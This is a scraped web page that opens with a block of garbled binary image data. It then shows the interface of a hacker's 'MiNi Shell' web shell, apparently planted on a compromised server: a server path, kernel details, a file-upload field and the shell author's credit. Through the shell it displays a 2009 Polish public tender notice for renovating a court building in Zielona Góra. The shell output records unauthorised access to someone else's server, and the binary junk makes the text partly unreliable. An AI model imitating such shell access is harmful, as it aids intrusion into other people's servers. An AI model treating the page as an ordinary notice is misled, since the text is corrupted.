JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090402/89834-N-2009.html

<p class="kh_header"><b>Zielona Góra: Remont części wnętrz budynku Sądu Rejonowego w Zielonej Górze
przy Placu Słowiańskim 2</b><br>
<b>Numer ogłoszenia: 89834 - 2009; data zamieszczenia: 02.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sąd Okręgowy w Zielonej Górze , Pl. Słowiański 1, 65-958 Zielona Góra, woj. lubuskie, tel. 068 3220155, faks 068 3220155.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zielona-gora.so.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont części wnętrz budynku Sądu Rejonowego w Zielonej Górze
przy Placu Słowiańskim 2.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie robót budowlanych, w oparciu o opracowane projekty budowlano-wykonawcze, w następującym zakresie rzeczowym:
2.1.Roboty remontowe budowlane.
Na podstawie projektu budowlano - wykonawczego pn. Projekt wielobranżowy na remont budynku Sądu Rejonowego przy Placu Słowiańskim 2 w Zielonej Górze - wymiana zespołów wejściowych, wydzielenie stref pożarowych z grudnia 2007 roku, opracowanego przez mgr inż. Mariolę Radwańską (do wglądu u Zamawiającego)  zamówienie obejmuje wyłącznie  wykonanie elementów robót budowlanych na ciągach komunikacyjnych i w pomieszczeniach socjalnych:                                                                    
2.1.1.Sufity podwieszane na korytarzach i w holach 6 kondygnacji nadziemnych oraz w pomieszczeniach socjalnych na III, IV, V piętrze (wg załączonych projektów tych kondygnacji - załączniki nr 1,2,3,4,5,6 w Rozdziale III ). Sufity składają się z płyt o wymiarach 600 x 600 mm  np. typu Thermatex (bądź równoważnego) i konstrukcji nośnej z systemowych ocynkowanych elementów stalowych. Płyty wypełniające powinny być wykonane z włókien mineralnych z fakturą od dołu w kolorze białym ( faktura płyt do wyboru przez Użytkownika ). Sufity te stanowią maskowanie wykonanych  poziomych przewodów wentylacji i należy je zamontować  na jednej wysokości tj. 2,80 m od posadzki ( parter, I, II.,piętro ), dodatkowo na I piętrze  w korytarzu głównym - na dwóch wysokościach od posadzki tj. 2,20m i 2,80 m. Przy w/w zróżnicowaniu wysokości podwieszanych sufitów należy wykonać  pionowe obudowy z jednej  warstwy malowanych trzykrotnie emulsyjnie  płyt gipsowo - kartonowych GKF gr. 12,5 mm na ocynkowanym  systemowym stelażu stalowym  o wysokości ok. 60 cm  a także o tej samej wysokości na parterze, I i II piętrze - od strony dźwigów osobowych, jako pionową, boczną  obudowę na krawędzi sufitów podwieszanych i stałego istniejącego sufitu ( w miejscach zaprojektowanych ścianek przeciwpożarowych, które realizowane będą na kolejnym etapie remontu - szczegóły podano na  załącznikach nr 1,2,3 w Rozdziale III ) Wymagane jest też zagięcie sufitów podwieszanych do styku ścian zewnętrznych i istniejącego stałego sufitu tj. ostatniego pasma podwieszonego sufitu np. o szer. 60 cm przy oknach  I i II piętra - aby możliwe było mycie nadstawek okiennych na korytarzach. Od III do V piętra w holach i na korytarzach sufity podwieszane należy zamontować na wysokości 2,50 m od poziomu posadzki a na granicy podwieszenia i istniejących  stałych sufitów pionowe graniczne wykończenie należy wykonać z systemowych płyt 600 x 600 mm (zał. nr 4,5,6 w Rozdziale III).
Ponadto wymagane jest wykonanie podwieszanych obudów na parterze i II piętra z jednej warstwy płyt gipsowo - kartonowych GKF gr. 12,5 mm na w/w stelażu do suchych tynków - w miejscach skrzyżowania poziomych przewodów wentylacyjnych nawiewu i wywiewu I piętro) oraz w  miejscach podejść przewodów wentylacyjnych pod istniejącymi podciągami ( na parterze i na II piętrze). Wszystkie te szczegóły pokazano  na załącznikach nr 1,2,3 w Rozdziale III .
Uwaga: podczas montażu sufitów podwieszanych na I i II piętrze należy przewidzieć możliwość wykonania w przyszłości ścianek działowych z płyt gipsowo - kartonowych na stelażu dla suchych tynków (będą to dodatkowe pomieszczenia biurowe) widocznych na I i II piętrze - załączniki nr 2 i 3 w Rozdziale III , także należy przewidzieć odpowiedni rytm płyt sufitowych o module 600 x 600 mm ( względy estetyczne ) oraz  zagęszczenie wieszaków stelażu sufitu podwieszanego po obu stronach przyszłościowych w/w ścianek  
Przy realizacji w/w sufitów podwieszonych należy uwzględnić montaż opisanych niżej  nowych opraw oświetleniowych, przewidzianych w tym zamówieniu.
2.1.2.Obudowy pionów wentylacyjnych w holach i pomieszczeniach socjalnych oraz  pionów instalacji c.o. na podestach międzypiętrowych na klatce schodowej przy dźwigach osobowych (od parteru do V piętra ) należy wykonać z dwóch warstw płyt gipsowo - kartonowych GKF gr. 12,5 mm montowanych na systemowym dla suchych tynków ocynkowanym stelażu stalowym wraz z wbudowaniem ochronnych niepalnych narożników na wystających krawędziach w/w obudów. W miejscach zamontowania regulatorów wydajności powietrza na  pionach wentylacyjnych należy zamontować w obudowach metalowe, malowane proszkowo, zamykane na kluczyk drzwiczki rewizyjne o wym. 40 x 30 cm  - 6  szt a także 30 szt drzwiczek o wym. 30 x 30 cm o takiej samej konstrukcji - na potrzeby czyszczenia i konserwacji wentylacji. Projektowaną lokalizację obudów oraz w/w drzwiczek podano na załącznikach nr 1,2,3,4,5,6 w Rozdziale III.
2.1.3.	Trzykrotne malowanie emulsyjne wszystkich wykonanych obudów z w/w płyt gipsowo - kartonowych - kolor do uzgodnienia z Użytkownikiem.
2.2.Roboty remontowe elektryczne
W ramach niniejszego zamówienia należy wykonać następujące remontowe roboty branży elektrycznej:
2.2.1.  Wykonanie nowej instalacji  przewodem elektrycznym YDYżo 5 x 1,5 mm2 od parteru do V piętra (wg załączników nr 7,8,9,10,11,12 w Rozdziale III ), w tym:
- nad sufitami podwieszanymi mają być one montowane na uchwytach do istniejącego sufitu stałego,
- na sufitach klatki schodowej i fragmentach sufitów holach ( gdzie nie będzie sufitów podwieszanych - dotyczy III, IV i V piętra ) - podtynkowo,
- na  klatce schodowej, zasilający oprawy oświetleniowe typu plafoniera - podtynkowo,
- w holach w listwie instalacyjnej 40 x 20 mm montowanej na tynku typu cyklina,    - wszystkie nowe obwody należy podłączyć do istniejącej szafki sterowania oświetleniem na parterze budynku.( przy wejściu głównym).
- w tablicy tej należy zdemontować istniejącą płytę pionową z ebonitu z wyłącznikami i bezpiecznikami starego typu oraz zamontować w tym miejscu nowe wyposażenie szafki oświetleniowej w bezpieczniki typu S oraz wyłączniki typu FR; należy także ponownie włączyć istniejące obwody nie objęte niniejszym zamówieniem - na oświetlenie dwóch poziomów piwnicznych i oświetlenie ewakuacyjnej klatki schodowej bez dźwigów osobowych; metalowe drzwiczki tej szafki w tym zamówieniu nie podlegają wymianie.
Uwaga: po wykonaniu instalacji elektrycznej podtynkowej należy przemalować farbą emulsyjną całe sufity klatki schodowej i holi - z wyłączeniem sufitów podwieszonych.
2.2.2. Nowe oprawy na klatce schodowej typu plafoniera np  EP.022.1, 2 x 20W z mlecznym kloszem, o średnicy 360 mm, lub równoważne o takich samych parametrach technicznych i zbliżonej estetyce.
2.2.3.  Nowe okrągłe oprawy do sufitów podwieszanych na korytarzach i w holach np. typu CA.040.1.20 o średnicy 240 mm z szybą centralnie matowioną CD.007.
Uwaga: całość w/w robót należy wykonać zgodnie z w/w załącznikami tj projektami   wg załączonych przykładowych kart katalogowych producenta zaprojektowanych opraw (zał. nr 15,16 w Rozdziale III ). 
2.2.4. Wszystkie  zdemontowane przez Wykonawcę stare oprawy oświetleniowe od parteru do V piętra Wykonawca przekaże za pokwitowaniem Użytkownikowi.
2.2.5. Po wykonaniu nowych instalacji oświetleniowych wraz z oprawami oświetleniowymi wymagane jest wykonanie pomiarów elektrycznych całej nowej instalacji.
2.3.Modyfikacja istniejącej instalacji odgromowej.
Do ochrony przed skutkami bezpośrednich wyładowań atmosferycznych na budynku, po zamontowaniu w roku 2008 urządzeń na dachu należy wykonać uzupełniające elementy instalacji odgromowej na dachu głównym budynku. Zwody poziome, przewody odprowadzające (do istniejących złączy kontrolnych ) wykonać przewodem FeZn c 8 mm2. Należy zainstalować iglice odgromowe ustawione na podstawach betonowych, pod którymi dla ochrony pokrycia papowego dachu należy ułożyć maty ochronne. Iglice połączyć do zwodów poziomych instalacji odgromowej . Lokalizację oraz wysokości iglic podano w projektach (zał. nr 13 w Rozdziale III).
Instalację odgromową wysoką, montowaną na skrajach do kotew odciągowych i podłączonych do zwodów poziomych, a w centralnej części mocowanych na szczycie konstrukcji wsporczych ustawionych na podstawach betonowych,  pod którymi także należy ułożyć maty ochronne. Wysokość konstrukcji wsporczych h = 4m. Instalacja konstrukcji wsporczych i lokalizację kotew odciągowych pokazano w projekcie . Instalacja wysoka swoim kątem ochrony ma obejmować chronione kanały wentylacyjne i urządzenia.
Po wykonaniu nowych elementów instalacji odgromowej na głównym dachu budynku , w  skład których wchodzą:
- instalacja niska na murkach ogniowych i ciągu kominów,
- iglice odgromowe ustawione przy urządzeniach,
- instalacja wysoka nad kanałami wentylacyjnymi,
wymagane jest  wykonanie przez Wykonawcę  pomiaru kontrolnego odporności uziemienia dla całej instalacji odgromowej w budynku. Odporność uziemienia ma być mniejsza od 30 omów.
2.4.Wymiana poziomej rury wodociągowej.
Na poziomie minus 2 należy zdemontować istniejący odcinek  rury z PVC na rurę stalową ocynkowaną o średnicy 50 mm , prowadząc nowy przewód wodociągowy trasą podaną na załączonym rysunku.- załącznik nr 14 w Rozdziale III. Rurę po wymianie należy zaizolować otuliną Thermaflex gr 13 mm lub równoważną. Przy realizacji tego zadania harmonogram robót na roboczo należy uzgadniać z Użytkownikiem. Po zakończeniu prac należy wykonać wodną próbę ciśnieniową na 1 MPa z udziałem inspektora nadzoru.
Uwagi końcowe.
Przy odbiorze końcowym Zamawiający i Użytkownik wymagał będzie od Wykonawcy dokumentacji powykonawczej na całość wykonanych prac oraz protokołów z w/w pomiarów i prób..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.23.24.60-4, 45.31.00.00-3, 45.31.23.11-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiajacy nie ząda wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.Potencjał kadrowy:
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel zdolny do wykonania zamówienia, tj:
- Kierownika budowy z uprawnieniami wykonawczymi bez ograniczeń branży budowlanej w zakresie konstrukcyjno-budowlanym - min. 2 prace poparte referencjami zbliżonymi do przedmiotu zamówienia (np. określające budynek, wielkość, kubaturę).
- Kierownika robót z uprawnieniami wykonawczymi bez ograniczeń  branży elektrycznej dla budynków w zakresie instalacji i urządzeń elektrycznych - min 2 prace poparte referencjami zbliżonymi do przedmiotu zamówienia (np. określające budynek, wielkość, kubaturę)
Osoby przewidziane na ww. stanowiska muszą być członkami Izby Inżynierów Budownictwa i mieć opłacone wymagane składki zgodnie z Ustawą  o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001 r. Nr 5, poz. 42, z późn. zm.) oraz opłacone ubezpieczenie od odpowiedzialności cywilnej zgodnie z Rozporządzeniem Ministra Finansów z dnia 11 grudnia 2003 r. w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej architektów oraz inżynierów budownictwa  (Dz. U. z 2003 r. Nr 220, poz. 2174).
Wykonawca musi mieć do dyspozycji odpowiednio wykwalifikowany personel zdolny do wykonania zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności
2.Doświadczenie zawodowe:
Wykonawca musi wykazać się zrealizowaniem, udokumentowanymi np. referencjami, w okresie ostatnich 5 lat, (min. 3) zamówienia o charakterze i złożoności porównywalnej z zakresem niniejszego zamówienia o kubaturze budynku nie mniejszej niż 1000m3 w każdej z tych robót..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.Formularz oferty na załączniku nr 1 i z wypełnionym harmonogramem rzeczowo-finansowym- załącznik 1a.
2.Dane Wykonawcy na załączniku nr 2.
3.Oświadczenie Wykonawcy w trybie art. 22 ust. 1 ustawy Prawo zamówień publicznych na formularzu stanowiącym załącznik nr 3 do Instrukcji dla Wykonawców.
4.W celu potwierdzenia, że Wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności nie podlega wykluczeniu na podstawie art. 24 ustawy wykonawca musi przedstawić w ofercie następujące dokumenty:
a. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej, niż 6 miesięcy przed upływem terminu składania ofert,
b.aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzonych odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego  organu - wystawionych nie wcześniej niż 3 miesiące  przed upływem terminu składania ofert,
c.jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt. 4 składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że:
- nie otwarto jego likwidacji ani nie ogłoszono upadłości;
- nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
Dokumenty te powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu, o którym mowa wyżej, zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
5.W celu potwierdzenia opisanego przez Zamawiającego warunku posiadania przez Wykonawcę posiada niezbędną wiedzę i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi do wykonania zamówienia do oferty należy dołączyć:
5.1.Wykaz wykonanych robót budowlanych w ciągu ostatnich 5 lat min. 3 przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem, zakresem i wartością robotom budowlanym stanowiącym przedmiot zamówienia z podaniem ich wartości oraz daty i miejsce wykonania o kubaturze budynku nie mniejszej niż 1000m3 w każdej z tych robót - załącznik nr 4 - wraz z załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie np. dokumenty, referencje od poprzednich Zamawiających na potwierdzenie spełnienia warunku
5.2.Wykaz osób Kierownika budowy z uprawnieniami wykonawczymi bez ograniczeń branży budowlanej w zakresie konstrukcyjno-budowlanym - min. 2 prace poparte referencjami zbliżonymi do przedmiotu zamówienia np. określające budynek, wielkość, kubatura; Kierownika robót z uprawnieniami wykonawczymi bez ograniczeń  branży elektrycznej dla budynków w zakresie instalacji i urządzeń elektrycznych - min 2 prace poparte referencjami zbliżonymi do przedmiotu zamówienia np. określające budynek, wielkość, kubatura którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia a także zakresu wykonywanych przez nie czynności  -  załącznik nr 5 na potwierdzenie spełnienia warunku  wraz z dokumentami stwierdzającymi, że osoby które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia konieczny odpis uprawnień oraz zaświadczenie o przynależności do Izby Inżynierów Budownictwa.
5.3.Pisemne zobowiązania innych podmiotów do udostępnienia niezbędnych do wykonania zamówienia, jeżeli w wykazie o którym mowa w ppkt. 5.2. wykonawca wskazał osoby, którymi będzie dysponował - Załącznik nr 6 na potwierdzenie spełnienia warunku.
6.Oświadczenie Wykonawcy o udzieleniu gwarancji - Załącznik nr 7.
7.Oświadczenie Wykonawcy o dokonaniu wizji placu robót w budynku Sądu  Rejonowego w Zielonej Górze - załącznik nr 8 potwierdzone przez Użytkownika.
8.W przypadku składania oferty przez Wykonawców ubiegających się wspólnie o udzielenie zamówienia:
a zgodnie z art. 23 ust. 2 ustawy Prawo zamówień publicznych, ustanawiają pełnomocnika do reprezentowania ich w niniejszym postępowaniu o udzielenie zamówienia albo do reprezentowania w tym postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, treść pełnomocnictwa powinna dokładnie określać zakres umocowania - wszelka korespondencja oraz rozliczenia dokonywane będą wyłącznie z pełnomocnikiem lub liderem, pełnomocnictwo podpisane przez obu Wykonawców winno być dołączone do oferty,
b wypełniając formularz ofertowy jak również inne dokumenty powołujące się na Wykonawcę w miejscu np. nazwa i adres Wykonawcy należy wpisać dane dotyczące wszystkich współpartnerów, a nie ich pełnomocnika - lidera lub jednego ze współpartnerów;
c)w przypadku złożenia przez Wykonawców występujących wspólnie zabezpieczenia należytego wykonania umowy w formie gwarancji, dokument ten powinien być wystawiony na wszystkich współpartnerów łącznie, a nie ich pełnomocnika lub jednego ze współpartnerów
d)każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia zobowiązany jest złożyć wszystkie dokumenty dotyczące właściwości Wykonawcy, o których mowa w ppkt IV, ppkt 3 i 4.
9.Opłacona polisa odpowiedzialności cywilnej w związku z prowadzeniem działalności gospodarczej, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności.
10.Zgodnie z art. 26 ust. 3 ustawy Zamawiający wezwie Wykonawców, którzy w określonym terminie nie złożyli wymaganych oświadczeń lub dokumentów potwierdzających spełnianie warunków udziału w postępowaniu oraz spełnienie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, lub którzy nie złożyli pełnomocnictw, albo którzy złożyli wymagane dokumenty i oświadczenia zawierające błędy lub którzy złożyli wadliwe pełnomocnictwa, do ich złożenia w wyznaczonym terminie, chyba że mimo ich złożenia oferta Wykonawcy podlegać będzie odrzuceniu lub konieczne byłoby unieważnienie postępowania. Złożone na wezwanie dokumenty i oświadczenia powinny potwierdzać spełnianie przez Wykonawcę warunków udziału w postępowaniu oraz spełnienie przez oferowane roboty budowlane wymagań określonych przez Zamawiającego, nie później niż w dniu, w którym upłynął termin składania ofert.
11.Zamawiający nie żąda dołączenia do oferty kosztorysów ofertowych..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zielona-gora.so.gov.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sąd Okręgowy Zielona Góra, Plac Słowiański 1, 65-958 Zielona Góra
Oddział Gospodarczy.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2009 godzina 10:30, miejsce: Sąd Okręgowy Zielona Góra, Plac Słowiański 1, pok. nr 20 (Sekretariat Prezesa Sądu Okręgowego).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com